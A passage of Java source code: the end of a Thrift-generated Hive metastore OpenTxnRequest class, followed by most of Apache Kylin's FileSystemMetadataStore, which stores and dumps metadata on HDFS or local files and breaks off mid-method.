other.isSetUser()); if (lastComparison != 0) { return lastComparison; } if (isSetUser()) { lastComparison = org.apache.thrift.TBaseHelper.compareTo(this.user, other.user); if (lastComparison != 0) { return lastComparison; } } lastComparison = java.lang.Boolean.compare(isSetHostname(), other.isSetHostname()); if (lastComparison != 0) { return lastComparison; } if (isSetHostname()) { lastComparison = org.apache.thrift.TBaseHelper.compareTo(this.hostname, other.hostname); if (lastComparison != 0) { return lastComparison; } } lastComparison = java.lang.Boolean.compare(isSetAgentInfo(), other.isSetAgentInfo()); if (lastComparison != 0) { return lastComparison; } if (isSetAgentInfo()) { lastComparison = 
org.apache.thrift.TBaseHelper.compareTo(this.agentInfo, other.agentInfo); if (lastComparison != 0) { return lastComparison; } } lastComparison = java.lang.Boolean.compare(isSetReplPolicy(), other.isSetReplPolicy()); if (lastComparison != 0) { return lastComparison; } if (isSetReplPolicy()) { lastComparison = org.apache.thrift.TBaseHelper.compareTo(this.replPolicy, other.replPolicy); if (lastComparison != 0) { return lastComparison; } } lastComparison = java.lang.Boolean.compare(isSetReplSrcTxnIds(), other.isSetReplSrcTxnIds()); if (lastComparison != 0) { return lastComparison; } if (isSetReplSrcTxnIds()) { lastComparison = org.apache.thrift.TBaseHelper.compareTo(this.replSrcTxnIds, other.replSrcTxnIds); if (lastComparison != 0) { return lastComparison; } } lastComparison = java.lang.Boolean.compare(isSetTxn_type(), other.isSetTxn_type()); if (lastComparison != 0) { return lastComparison; } if (isSetTxn_type()) { lastComparison = org.apache.thrift.TBaseHelper.compareTo(this.txn_type, other.txn_type); if (lastComparison != 0) { return lastComparison; } } return 0; } @org.apache.thrift.annotation.Nullable public _Fields fieldForId(int fieldId) { return _Fields.findByThriftId(fieldId); } public void read(org.apache.thrift.protocol.TProtocol iprot) throws org.apache.thrift.TException { scheme(iprot).read(iprot, this); } public void write(org.apache.thrift.protocol.TProtocol oprot) throws org.apache.thrift.TException { scheme(oprot).write(oprot, this); } @Override public java.lang.String toString() { java.lang.StringBuilder sb = new java.lang.StringBuilder("OpenTxnRequest("); boolean first = true; sb.append("num_txns:"); sb.append(this.num_txns); first = false; if (!first) sb.append(", "); sb.append("user:"); if (this.user == null) { sb.append("null"); } else { sb.append(this.user); } first = false; if (!first) sb.append(", "); sb.append("hostname:"); if (this.hostname == null) { sb.append("null"); } else { sb.append(this.hostname); } first = false; if (isSetAgentInfo()) 
{ if (!first) sb.append(", "); sb.append("agentInfo:"); if (this.agentInfo == null) { sb.append("null"); } else { sb.append(this.agentInfo); } first = false; } if (isSetReplPolicy()) { if (!first) sb.append(", "); sb.append("replPolicy:"); if (this.replPolicy == null) { sb.append("null"); } else { sb.append(this.replPolicy); } first = false; } if (isSetReplSrcTxnIds()) { if (!first) sb.append(", "); sb.append("replSrcTxnIds:"); if (this.replSrcTxnIds == null) { sb.append("null"); } else { sb.append(this.replSrcTxnIds); } first = false; } if (isSetTxn_type()) { if (!first) sb.append(", "); sb.append("txn_type:"); if (this.txn_type == null) { sb.append("null"); } else { sb.append(this.txn_type); } first = false; } sb.append(")"); return sb.toString(); } public void validate() throws org.apache.thrift.TException { // check for required fields if (!isSetNum_txns()) { throw new org.apache.thrift.protocol.TProtocolException("Required field 'num_txns' is unset! Struct:" + toString()); } if (!isSetUser()) { throw new org.apache.thrift.protocol.TProtocolException("Required field 'user' is unset! Struct:" + toString()); } if (!isSetHostname()) { throw new org.apache.thrift.protocol.TProtocolException("Required field 'hostname' is unset! Struct:" + toString()); } // check for sub-struct validity } private void writeObject(java.io.ObjectOutputStream out) throws java.io.IOException { try { write(new org.apache.thrift.protocol.TCompactProtocol(new org.apache.thrift.transport.TIOStreamTransport(out))); } catch (org.apache.thrift.TException te) { throw new java.io.IOException(te); } } private void readObject(java.io.ObjectInputStream in) throws java.io.IOException, java.lang.ClassNotFoundException { try { // it doesn't seem like you should have to do this, but java serialization is wacky, and doesn't call the default constructor. 
__isset_bitfield = 0; read(new org.apache.thrift.protocol.TCompactProtocol(new org.apache.thrift.transport.TIOStreamTransport(in))); } catch (org.apache.thrift.TException te) { throw new java.io.IOException(te); } } private static class OpenTxnRequestStandardSchemeFactory implements org.apache.thrift.scheme.SchemeFactory { public OpenTxnRequestStandardScheme getScheme() { return new OpenTxnRequestStandardScheme(); } } private static class OpenTxnRequestStandardScheme extends org.apache.thrift.scheme.StandardScheme<OpenTxnRequest> { public void read(org.apache.thrift.protocol.TProtocol iprot, OpenTxnRequest struct) throws org.apache.thrift.TException { org.apache.thrift.protocol.TField schemeField; iprot.readStructBegin(); while (true) { schemeField = iprot.readFieldBegin(); if (schemeField.type == org.apache.thrift.protocol.TType.STOP) { break; } switch (schemeField.id) { case 1: // NUM_TXNS if (schemeField.type == org.apache.thrift.protocol.TType.I32) { struct.num_txns = iprot.readI32(); struct.setNum_txnsIsSet(true); } else { org.apache.thrift.protocol.TProtocolUtil.skip(iprot, schemeField.type); } break; case 2: // USER if (schemeField.type == org.apache.thrift.protocol.TType.STRING) { struct.user = iprot.readString(); struct.setUserIsSet(true); } else { org.apache.thrift.protocol.TProtocolUtil.skip(iprot, schemeField.type); } break; case 3: // HOSTNAME if (schemeField.type == org.apache.thrift.protocol.TType.STRING) { struct.hostname = iprot.readString(); struct.setHostnameIsSet(true); } else { org.apache.thrift.protocol.TProtocolUtil.skip(iprot, schemeField.type); } break; case 4: // AGENT_INFO if (schemeField.type == org.apache.thrift.protocol.TType.STRING) { struct.agentInfo = iprot.readString(); struct.setAgentInfoIsSet(true); } else { org.apache.thrift.protocol.TProtocolUtil.skip(iprot, schemeField.type); } break; case 5: // REPL_POLICY if (schemeField.type == org.apache.thrift.protocol.TType.STRING) { struct.replPolicy = iprot.readString(); 
struct.setReplPolicyIsSet(true); } else { org.apache.thrift.protocol.TProtocolUtil.skip(iprot, schemeField.type); } break; case 6: // REPL_SRC_TXN_IDS if (schemeField.type == org.apache.thrift.protocol.TType.LIST) { { org.apache.thrift.protocol.TList _list796 = iprot.readListBegin(); struct.replSrcTxnIds = new java.util.ArrayList<java.lang.Long>(_list796.size); long _elem797; for (int _i798 = 0; _i798 < _list796.size; ++_i798) { _elem797 = iprot.readI64(); struct.replSrcTxnIds.add(_elem797); } iprot.readListEnd(); } struct.setReplSrcTxnIdsIsSet(true); } else { org.apache.thrift.protocol.TProtocolUtil.skip(iprot, schemeField.type); } break; case 7: // TXN_TYPE if (schemeField.type == org.apache.thrift.protocol.TType.I32) { struct.txn_type = org.apache.hadoop.hive.metastore.api.TxnType.findByValue(iprot.readI32()); struct.setTxn_typeIsSet(true); } else { org.apache.thrift.protocol.TProtocolUtil.skip(iprot, schemeField.type); } break; default: org.apache.thrift.protocol.TProtocolUtil.skip(iprot, schemeField.type); } iprot.readFieldEnd(); } iprot.readStructEnd(); struct.validate(); } public void write(org.apache.thrift.protocol.TProtocol oprot, OpenTxnRequest struct) throws org.apache.thrift.TException { struct.validate(); oprot.writeStructBegin(STRUCT_DESC); oprot.writeFieldBegin(NUM_TXNS_FIELD_DESC); oprot.writeI32(struct.num_txns); oprot.writeFieldEnd(); if (struct.user != null) { oprot.writeFieldBegin(USER_FIELD_DESC); oprot.writeString(struct.user); oprot.writeFieldEnd(); } if (struct.hostname != null) { oprot.writeFieldBegin(HOSTNAME_FIELD_DESC); oprot.writeString(struct.hostname); oprot.writeFieldEnd(); } if (struct.agentInfo != null) { if (struct.isSetAgentInfo()) { oprot.writeFieldBegin(AGENT_INFO_FIELD_DESC); oprot.writeString(struct.agentInfo); oprot.writeFieldEnd(); } } if (struct.replPolicy != null) { if (struct.isSetReplPolicy()) { oprot.writeFieldBegin(REPL_POLICY_FIELD_DESC); oprot.writeString(struct.replPolicy); oprot.writeFieldEnd(); } } if 
(struct.replSrcTxnIds != null) { if (struct.isSetReplSrcTxnIds()) { oprot.writeFieldBegin(REPL_SRC_TXN_IDS_FIELD_DESC); { oprot.writeListBegin(new org.apache.thrift.protocol.TList(org.apache.thrift.protocol.TType.I64, struct.replSrcTxnIds.size())); for (long _iter799 : struct.replSrcTxnIds) { oprot.writeI64(_iter799); } oprot.writeListEnd(); } oprot.writeFieldEnd(); } } if (struct.txn_type != null) { if (struct.isSetTxn_type()) { oprot.writeFieldBegin(TXN_TYPE_FIELD_DESC); oprot.writeI32(struct.txn_type.getValue()); oprot.writeFieldEnd(); } } oprot.writeFieldStop(); oprot.writeStructEnd(); } } private static class OpenTxnRequestTupleSchemeFactory implements org.apache.thrift.scheme.SchemeFactory { public OpenTxnRequestTupleScheme getScheme() { return new OpenTxnRequestTupleScheme(); } } private static class OpenTxnRequestTupleScheme extends org.apache.thrift.scheme.TupleScheme<OpenTxnRequest> { @Override public void write(org.apache.thrift.protocol.TProtocol prot, OpenTxnRequest struct) throws org.apache.thrift.TException { org.apache.thrift.protocol.TTupleProtocol oprot = (org.apache.thrift.protocol.TTupleProtocol) prot; oprot.writeI32(struct.num_txns); oprot.writeString(struct.user); oprot.writeString(struct.hostname); java.util.BitSet optionals = new java.util.BitSet(); if (struct.isSetAgentInfo()) { optionals.set(0); } if (struct.isSetReplPolicy()) { optionals.set(1); } if (struct.isSetReplSrcTxnIds()) { optionals.set(2); } if (struct.isSetTxn_type()) { optionals.set(3); } oprot.writeBitSet(optionals, 4); if (struct.isSetAgentInfo()) { oprot.writeString(struct.agentInfo); } if (struct.isSetReplPolicy()) { oprot.writeString(struct.replPolicy); } if (struct.isSetReplSrcTxnIds()) { { oprot.writeI32(struct.replSrcTxnIds.size()); for (long _iter800 : struct.replSrcTxnIds) { oprot.writeI64(_iter800); } } } if (struct.isSetTxn_type()) { oprot.writeI32(struct.txn_type.getValue()); } } @Override public void read(org.apache.thrift.protocol.TProtocol prot, OpenTxnRequest 
struct) throws org.apache.thrift.TException { org.apache.thrift.protocol.TTupleProtocol iprot = (org.apache.thrift.protocol.TTupleProtocol) prot; struct.num_txns = iprot.readI32(); struct.setNum_txnsIsSet(true); struct.user = iprot.readString(); struct.setUserIsSet(true); struct.hostname = iprot.readString(); struct.setHostnameIsSet(true); java.util.BitSet incoming = iprot.readBitSet(4); if (incoming.get(0)) { struct.agentInfo = iprot.readString(); struct.setAgentInfoIsSet(true); } if (incoming.get(1)) { struct.replPolicy = iprot.readString(); struct.setReplPolicyIsSet(true); } if (incoming.get(2)) { { org.apache.thrift.protocol.TList _list801 = iprot.readListBegin(org.apache.thrift.protocol.TType.I64); struct.replSrcTxnIds = new java.util.ArrayList<java.lang.Long>(_list801.size); long _elem802; for (int _i803 = 0; _i803 < _list801.size; ++_i803) { _elem802 = iprot.readI64(); struct.replSrcTxnIds.add(_elem802); } } struct.setReplSrcTxnIdsIsSet(true); } if (incoming.get(3)) { struct.txn_type = org.apache.hadoop.hive.metastore.api.TxnType.findByValue(iprot.readI32()); struct.setTxn_typeIsSet(true); } } } private static <S extends org.apache.thrift.scheme.IScheme> S scheme(org.apache.thrift.protocol.TProtocol proto) { return (org.apache.thrift.scheme.StandardScheme.class.equals(proto.getScheme()) ? STANDARD_SCHEME_FACTORY : TUPLE_SCHEME_FACTORY).getScheme(); } }
apache/kylin
36,037
src/core-common/src/main/java/org/apache/kylin/common/persistence/metadata/FileSystemMetadataStore.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.kylin.common.persistence.metadata; import static org.apache.hadoop.fs.CommonConfigurationKeysPublic.IO_FILE_BUFFER_SIZE_DEFAULT; import static org.apache.hadoop.fs.CommonConfigurationKeysPublic.IO_FILE_BUFFER_SIZE_KEY; import static org.apache.kylin.common.constant.Constants.CORE_META_DIR; import static org.apache.kylin.common.persistence.metadata.FileSystemFilterFactory.MATCH_ALL_EVAL; import static org.apache.kylin.common.persistence.metadata.FileSystemFilterFactory.convertConditionsToFilter; import static org.apache.kylin.common.util.HadoopUtil.FILE_PREFIX; import static org.apache.kylin.common.util.MetadataChecker.verifyNonMetadataFile; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; import java.util.Comparator; import java.util.Date; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.NavigableSet; import java.util.TreeSet; import java.util.concurrent.ExecutionException; import java.util.concurrent.ExecutorService; import java.util.concurrent.Future; import java.util.concurrent.LinkedBlockingQueue; 
import java.util.concurrent.ThreadPoolExecutor; import java.util.concurrent.TimeUnit; import java.util.function.BiConsumer; import java.util.stream.Collectors; import java.util.stream.Stream; import java.util.zip.CRC32; import java.util.zip.CheckedOutputStream; import java.util.zip.ZipEntry; import java.util.zip.ZipInputStream; import java.util.zip.ZipOutputStream; import org.apache.commons.io.IOUtils; import org.apache.hadoop.fs.FSDataOutputStream; import org.apache.hadoop.fs.FileStatus; import org.apache.hadoop.fs.FileSystem; import org.apache.hadoop.fs.LocalFileSystem; import org.apache.hadoop.fs.Path; import org.apache.hadoop.fs.RawLocalFileSystem; import org.apache.kylin.common.KylinConfig; import org.apache.kylin.common.exception.KylinRuntimeException; import org.apache.kylin.common.persistence.MetadataType; import org.apache.kylin.common.persistence.RawResource; import org.apache.kylin.common.persistence.RawResourceFilter; import org.apache.kylin.common.persistence.ResourceStore; import org.apache.kylin.common.persistence.SnapshotRawResource; import org.apache.kylin.common.persistence.VersionedRawResource; import org.apache.kylin.common.util.DaemonThreadFactory; import org.apache.kylin.common.util.FileSystemUtil; import org.apache.kylin.common.util.HadoopUtil; import org.apache.kylin.common.util.JsonUtil; import org.apache.kylin.common.util.Pair; import org.apache.kylin.guava30.shaded.common.annotations.VisibleForTesting; import org.apache.kylin.guava30.shaded.common.base.Preconditions; import org.apache.kylin.guava30.shaded.common.base.Throwables; import org.apache.kylin.guava30.shaded.common.collect.Lists; import org.apache.kylin.guava30.shaded.common.collect.Maps; import org.apache.kylin.guava30.shaded.common.collect.Sets; import org.apache.kylin.guava30.shaded.common.io.ByteSource; import org.apache.kylin.guava30.shaded.common.util.concurrent.Uninterruptibles; import lombok.Getter; import lombok.val; import lombok.experimental.Delegate; import 
lombok.extern.slf4j.Slf4j; @Slf4j public class FileSystemMetadataStore extends MetadataStore { public static final String HDFS_SCHEME = "hdfs"; public static final String FILE_SCHEME = "file"; private static final String COMPRESSED_FILE = "metadata.zip"; public static final String JSON_SUFFIX = ".json"; private static final int DEFAULT_FILE_NUMBER = 10000; @Delegate private final FileTransactionHelper helper; @VisibleForTesting protected static volatile ExecutorService fileSystemMetadataExecutor = null; @Getter protected Path rootPath; @Getter protected FileSystem fs; @Getter public enum Type { DIR, ZIP } @VisibleForTesting protected final Type type; private final CompressHandlerInterface compressHandlerInterface; public FileSystemMetadataStore(KylinConfig kylinConfig) throws IOException { // The file system metadata store will use NoopAuditLogStore by default super(kylinConfig); try { val storageUrl = kylinConfig.getMetadataUrl(); val scheme = storageUrl.getScheme(); Preconditions.checkState(HDFS_SCHEME.equals(scheme) || FILE_SCHEME.equals(scheme), "FileSystemMetadataStore only support hdfs or file scheme"); type = storageUrl.getParameter("zip") != null ? Type.ZIP : Type.DIR; compressHandlerInterface = storageUrl.getParameter("snapshot") != null ? new SnapShotCompressHandler() : new CompressHandler(); String pathStr = scheme.equals(HDFS_SCHEME) ? storageUrl.getParameter("path") : kylinConfig.getMetadataUrl().getIdentifier(); initWithMetadataPath(pathStr, scheme, kylinConfig); if (fs instanceof RawLocalFileSystem || fs instanceof LocalFileSystem) { // set this as false to avoid writing crc file when migrate or dump metadata. fs.setWriteChecksum(false); // set this as true to avoid building job failed in UT. 
fs.setVerifyChecksum(true); } if (!fs.exists(rootPath)) { Path p = rootPath; if (type == Type.ZIP && rootPath.toString().endsWith(".zip")) { p = rootPath.getParent(); } log.warn("Path not exist in FileSystem, create it: {}", p.toString()); fs.mkdirs(p); } if (fileSystemMetadataExecutor == null && kylinConfig.isConcurrencyProcessMetadataEnabled()) { synchronized (FileSystemMetadataStore.class) { if (fileSystemMetadataExecutor == null) { fileSystemMetadataExecutor = new ThreadPoolExecutor( kylinConfig.getConcurrencyProcessMetadataThreadNumber(), kylinConfig.getConcurrencyProcessMetadataThreadNumber(), 300L, TimeUnit.SECONDS, new LinkedBlockingQueue<>(), new DaemonThreadFactory("fileSystemMetadataExecutor")); } } } auditLogStore = new MemoryAuditLogStore(kylinConfig); helper = new FileTransactionHelper(this); log.info("The FileSystem location is {}, hdfs root path : {}", fs.getUri().toString(), rootPath.toString()); } catch (Exception e) { Throwables.throwIfUnchecked(e); throw new KylinRuntimeException(e); } } private void initWithMetadataPath(String pathStr, String scheme, KylinConfig kylinConfig) throws IOException { if (pathStr == null) { assert !scheme.equals(FILE_SCHEME) : "When scheme is file, the pathStr shouldn't be null"; pathStr = HadoopUtil.getBackupFolder(kylinConfig); fs = HadoopUtil.getWorkingFileSystem(); createMetaFolderIfNeed(new Path(pathStr)); Path tmpRootPath = Stream.of(FileSystemUtil.listStatus(fs, new Path(pathStr))) .filter(fileStatus -> fileStatus.getPath().getName().endsWith("_backup")) .max(Comparator.comparing(FileStatus::getModificationTime)).map(FileStatus::getPath) .orElse(new Path(pathStr + "/backup_0/")); createMetaFolderIfNeed(tmpRootPath); rootPath = checkCoreMetaDir(tmpRootPath); } else { if (scheme.equals(FILE_SCHEME) && !pathStr.startsWith(FILE_SCHEME)) { pathStr = FILE_PREFIX + new File(pathStr).getAbsolutePath(); } Path tempPath = new Path(pathStr); if (tempPath.toUri().getScheme() != null) { fs = 
HadoopUtil.getWorkingFileSystem(tempPath); rootPath = tempPath; } else { fs = HadoopUtil.getWorkingFileSystem(); rootPath = fs.makeQualified(tempPath); } } } // make compatible with old version KE, 'core_meta' directory does not exist in old version KE private Path checkCoreMetaDir(Path tmpRootPath) throws IOException { FileStatus[] fileStatuses = fs.listStatus(tmpRootPath); for (FileStatus fileStatus : fileStatuses) { if (fileStatus.isDirectory() && CORE_META_DIR.equals(fileStatus.getPath().getName())) { return fileStatus.getPath(); } } return tmpRootPath; } /** * Get resource from HDFS * @param type The type of the resource * @param filter The RawResource filter condition * @param needLock File system does not support lock * @param needContent Whether to load the content of the resource * @return The list of the RawResource */ @SuppressWarnings("unchecked") public <T extends RawResource> List<T> get(MetadataType type, RawResourceFilter filter, boolean needLock, boolean needContent) { Preconditions.checkArgument(type != MetadataType.ALL, "Fetching all metadata in the transaction is not allowed."); List<T> resList; val context = convertConditionsToFilter(filter, type); Class<T> resourceClass = (Class<T>) type.getResourceClass(); if (needLock) { if (context.isWholePath()) { lockResource(context.getResPath()); } else { lockResource(type.name()); } } try { if (this.type == Type.DIR) { resList = getFromDir(context, needContent, resourceClass); } else { resList = getFromZip(context, needContent, resourceClass); } } catch (IOException e) { throw new KylinRuntimeException("get resource fail", e); } return resList; } private <T extends RawResource> List<T> getFromDir(FileSystemFilterFactory.FilterContext context, boolean needContent, Class<T> resourceClass) throws IOException { List<T> resList = new ArrayList<>(); String resPath = context.getResPath(); RawResourceFilter jsonFilter = context.getRawResourceFilter(); Path p = getRealFileSystemPath(resPath); if 
(context.isWholePath()) { if (fs.exists(p) && fs.isFile(p)) { T rawResource = getRawResource(needContent, fs.getFileStatus(p), resourceClass, jsonFilter); if (rawResource != null) resList.add(rawResource); } } else { // With complex query, need to traverse files by filter `jsonFilter` if (fs.exists(p) && fs.isDirectory(p)) { val stream = context.getRegex() == null ? Arrays.stream(fs.listStatus(p)) : Arrays.stream(fs.globStatus(new Path(rootPath, resPath + "/" + MATCH_ALL_EVAL), path -> path.getName().matches(context.getRegex()))); stream.forEach(path -> { T rawResource = getRawResource(needContent, path, resourceClass, jsonFilter); if (rawResource != null) resList.add(rawResource); }); } } return resList; } private <T extends RawResource> List<T> getFromZip(FileSystemFilterFactory.FilterContext context, boolean needContent, Class<T> resourceClass) { List<T> resList = new ArrayList<>(); String resPath = context.getResPath(); RawResourceFilter jsonFilter = context.getRawResourceFilter(); if (context.isWholePath()) { val rawResource = resourceClass.cast(getCompressedFiles().get(resPath)); if (rawResource != null && jsonFilter.isMatch(rawResource)) { if (!needContent) { rawResource.setContent(null); } resList.add(rawResource); } } else { // With complex query, need to traverse files by filter `jsonFilter` getCompressedFiles().entrySet().stream() .filter(entry -> entry.getKey().startsWith(context.getResPath()) && (context.getRegex() == null || entry.getKey().matches(context.getResPath() + "/" + context.getRegex()))) .forEach(entry -> { val rawResource = resourceClass.cast(entry.getValue()); if (jsonFilter.isMatch(rawResource)) { if (!needContent) { rawResource.setContent(null); } resList.add(rawResource); } }); } return resList; } private <T extends RawResource> T getRawResource(boolean needContent, FileStatus fileStatus, Class<T> resourceClass, RawResourceFilter jsonFilter) { if (fileStatus.getLen() == 0) { log.warn("Zero length file: " + 
fileStatus.getPath().toString()); } String filePath = fileStatus.getPath().toString().replace(rootPath.toString(), ""); if (verifyNonMetadataFile(filePath)) { return null; } if (filePath.split("/", 2).length != 2) { throw new IllegalStateException("Can not get file path: " + filePath + "."); } String fileName = splitFilePath(filePath).getValue(); String metaKey = fileName.substring(0, fileName.length() - 5); T rawResource = openFileWithRetry(fileStatus.getPath(), resourceClass, needContent, 3); long ts = fileStatus.getModificationTime(); rawResource.setTs(ts); rawResource.setMetaKey(metaKey); rawResource.setMvcc(0); return jsonFilter.isMatch(rawResource) ? rawResource : null; } private <T extends RawResource> T openFileWithRetry(Path filePath, Class<T> resourceClass, boolean needContent, int retryCnt) { T rawResource; byte[] byteArray = null; try (val in = fs.open(filePath)) { byteArray = IOUtils.toByteArray(in); rawResource = JsonUtil.readValue(byteArray, resourceClass); } catch (Exception e) { log.warn("Failed to load resource from file: " + filePath); if (byteArray != null && byteArray.length == 0 && retryCnt > 0) { // Maybe this file is modified by others now, retry it. 
try { Thread.sleep(100); } catch (InterruptedException ex) { Thread.currentThread().interrupt(); throw new KylinRuntimeException(ex); } return openFileWithRetry(filePath, resourceClass, needContent, retryCnt - 1); } try { rawResource = resourceClass.newInstance(); } catch (Exception ex) { throw new KylinRuntimeException(ex); } } if (needContent) { rawResource.setContent(byteArray); } return rawResource; } public KylinConfig getKylinConfigFromFile() { Path confPath = new Path(rootPath, "kylin.properties"); try { if (!fs.exists(confPath)) { throw new KylinRuntimeException("kylin.properties not exist under: " + rootPath); } try (val in = fs.open(confPath)) { return KylinConfig.createKylinConfig(KylinConfig.streamToProps(in)); } } catch (IOException e) { throw new KylinRuntimeException("Read kylin.properties failed from file system."); } } private void dumpKylinConfigToFile(KylinConfig conf) { Path confPath = new Path(rootPath, "kylin.properties"); try (FSDataOutputStream out = fs.create(confPath, true)) { conf.exportToProperties().store(out, confPath.toString()); } catch (Exception e) { throw new KylinRuntimeException("Dump resource fail", e); } } @Override public int save(MetadataType type, final RawResource raw) { val resPath = raw.generateFilePath(); val p = getRealFileSystemPath(resPath); try { createMetaFolderIfNeed(p.getParent()); val bytes = raw.getContent(); if (bytes == null) { return fs.delete(p, true) ? 
1 : 0; } val bs = ByteSource.wrap(raw.getContent()); try (FSDataOutputStream out = createFileWithDefaultPermission(p)) { IOUtils.copy(bs.openStream(), out); out.hflush(); fs.setTimes(p, raw.getTs(), -1); } val fileStatus = fs.getFileStatus(p); if (fileStatus.getLen() == 0) { throw new KylinRuntimeException( "Put resource fail : " + resPath + ", because resource file is Zero length"); } if (bs.size() != fileStatus.getLen()) { throw new KylinRuntimeException( "Put resource fail : " + resPath + ", because resource file length not equal with ByteSource"); } } catch (IOException e) { throw new KylinRuntimeException(e); } return 1; } private FSDataOutputStream createFileWithDefaultPermission(Path f) throws IOException { return fs.create(f, null, true, fs.getConf().getInt(IO_FILE_BUFFER_SIZE_KEY, IO_FILE_BUFFER_SIZE_DEFAULT), fs.getDefaultReplication(f), fs.getDefaultBlockSize(f), null); } @Override public NavigableSet<String> listAll() { try { if (compressedFilesContains("/")) { return Sets.newTreeSet(getAllFilePathFromCompressedFiles()); } Path p = this.rootPath; if (!fs.exists(p) || !fs.isDirectory(p)) { log.warn("path {} does not exist in HDFS", p); return new TreeSet<>(); } // if you set kylin.env.engine-write-fs, the schema may be inconsistent. 
val replacedPath = Path.getPathWithoutSchemeAndAuthority(rootPath); val replacedValue = fs.makeQualified(replacedPath).toString(); return getAllFilePath(p, fs).parallelStream().map(path -> { String replaced = path.toString().replace(replacedValue + "/", ""); return pathWithoutJsonSuffix(replaced); }).collect(Collectors.toCollection(TreeSet::new)); } catch (IOException e) { Throwables.throwIfUnchecked(e); throw new KylinRuntimeException(e); } } protected RawResource loadOne(FileStatus status, Path parentPath) throws IOException, InstantiationException, IllegalAccessException { Path p = status.getPath(); if (status.getLen() == 0) { log.warn("Zero length file: " + p.toString()); } // if you set kylin.env.engine-write-fs, the schema may be inconsistent. val replacedPath = Path.getPathWithoutSchemeAndAuthority(parentPath); val replacedValue = fs.makeQualified(replacedPath).toString(); String replaced = p.toString().replace(replacedValue, ""); if (verifyNonMetadataFile(replaced)) { return null; } val srcPair = splitFilePath(replaced); RawResource res; byte[] byteArray; val resourceClass = srcPair.getKey().getResourceClass(); long ts = status.getModificationTime(); try (val in = fs.open(p)) { String metaKey = srcPair.getValue().substring(0, srcPair.getValue().length() - 5); byteArray = IOUtils.toByteArray(in); try { res = JsonUtil.readValue(byteArray, resourceClass); } catch (Exception e) { log.warn("Failed to load resource from file: " + p + ". 
This json file is broken!"); res = resourceClass.newInstance(); } if (res.getMetaKey() == null) { res.setMetaKey(metaKey); } res.setContent(byteArray); res.setMvcc(0); res.setTs(ts); return res; } } @Override public void dump(ResourceStore store) throws IOException, InterruptedException, ExecutionException { val resources = store.listResourcesRecursively(MetadataType.ALL.name()); if (Type.ZIP.name().equals(this.type.name())) { dumpToZip(store, resources, new Path(this.rootPath, COMPRESSED_FILE)); } else { dumpToFile(store, resources); } } /** * Dump metadata compressed file to FileSystem * @param store * @param resources * @throws IOException * @throws InterruptedException */ @Override public void dump(ResourceStore store, Collection<String> resources) throws IOException, InterruptedException { val compressedFile = new Path(this.rootPath, COMPRESSED_FILE); dumpToZip(store, resources, compressedFile); } public void dumpToFile(ResourceStore resourceStore, Collection<String> resources) throws ExecutionException, InterruptedException { dumpKylinConfigToFile(resourceStore.getConfig()); if (resources == null || resources.isEmpty()) { log.info("there is no resources to dump, please check."); return; } if (fileSystemMetadataExecutor == null || resources.size() < DEFAULT_FILE_NUMBER) { try { super.dump(resourceStore, resources); } catch (Exception e) { throw new KylinRuntimeException(e); } } else { List<String> batchResources = new ArrayList<>(DEFAULT_FILE_NUMBER); List<Future<Boolean>> futures = Lists.newArrayList(); for (String resPath : resources) { batchResources.add(resPath); if (batchResources.size() >= DEFAULT_FILE_NUMBER) { futures.addAll(batchInsertByResources(batchResources, resourceStore)); batchResources = new ArrayList<>(DEFAULT_FILE_NUMBER); } } // end for resources if (!batchResources.isEmpty()) { futures.addAll(batchInsertByResources(batchResources, resourceStore)); } if (!futures.isEmpty()) { for (Future<Boolean> task : futures) { task.get(); } } } // end 
else } /** * Dump metadata compressed file to FileSystem * * @param store Current ResourceStore * @param resources The resources to be dumped * @param compressedFile The path of the compressed file * @throws IOException * @throws InterruptedException */ public void dumpToZip(ResourceStore store, Collection<String> resources, Path compressedFile) throws IOException, InterruptedException { if (resources != null && !resources.isEmpty()) { try (FSDataOutputStream out = fs.create(compressedFile, true); ZipOutputStream zipOut = new ZipOutputStream(new CheckedOutputStream(out, new CRC32()))) { for (String resPath : resources) { val raw = store.getResource(resPath); if (Thread.interrupted()) { throw new InterruptedException(); } if (raw == null) { continue; } compress(zipOut, raw, resPath); } } catch (IOException e) { throw new IOException("Put compressed resource fail", e); } } else { log.info("there is no resources, please check."); } } private List<Future<Boolean>> batchInsertByResources(List<String> batchResources, ResourceStore resourceStore) { List<Future<Boolean>> taskList = Lists.newArrayList(); final List<String> innerBatchResources = batchResources; taskList.add(fileSystemMetadataExecutor.submit(() -> { for (String resource : innerBatchResources) { val raw = resourceStore.getResource(resource); save(raw.getMetaType(), raw); } innerBatchResources.clear(); return true; })); return taskList; } @Override public MemoryMetaData reloadAll() throws IOException { val compressedFile = getRealFileSystemPath(COMPRESSED_FILE); if (!fs.exists(compressedFile) || !fs.isFile(compressedFile)) { return getAllFile(rootPath); } log.info("reloadAll from metadata.zip"); MemoryMetaData data = MemoryMetaData.createEmpty(); getCompressedFiles().forEach((resPath, raw) -> data.put(raw.getMetaType(), new VersionedRawResource(raw))); return data; } private void compress(ZipOutputStream out, RawResource raw, String resPath) throws IOException { ZipEntry entry = new ZipEntry(resPath + 
JSON_SUFFIX); entry.setTime(raw.getTs()); out.putNextEntry(entry); compressHandlerInterface.write(out, raw); } public static Pair<MetadataType, String> splitFilePath(String resourcePath) { if ("/".equals(resourcePath)) { return new Pair<>(MetadataType.ALL, null); } else if (resourcePath.startsWith("/") && resourcePath.length() > 1) { resourcePath = resourcePath.substring(1); } String[] split = resourcePath.split("/", 2); if (split.length < 2) { throw new KylinRuntimeException("resourcePath is invalid: " + resourcePath); } String typeStr = split[0].toUpperCase(Locale.ROOT); return new Pair<>(MetadataType.create(typeStr), split[1]); } @VisibleForTesting protected Path getRealFileSystemPath(String resourcePath) { if (resourcePath.equals("/")) { return this.rootPath; } else if (resourcePath.endsWith(".zip")) { return new Path(this.rootPath, resourcePath); } else if (resourcePath.startsWith("/") && resourcePath.length() > 1) { resourcePath = resourcePath.substring(1); } return new Path(this.rootPath, resourcePath); } public static TreeSet<Path> getAllFilePath(Path filePath, 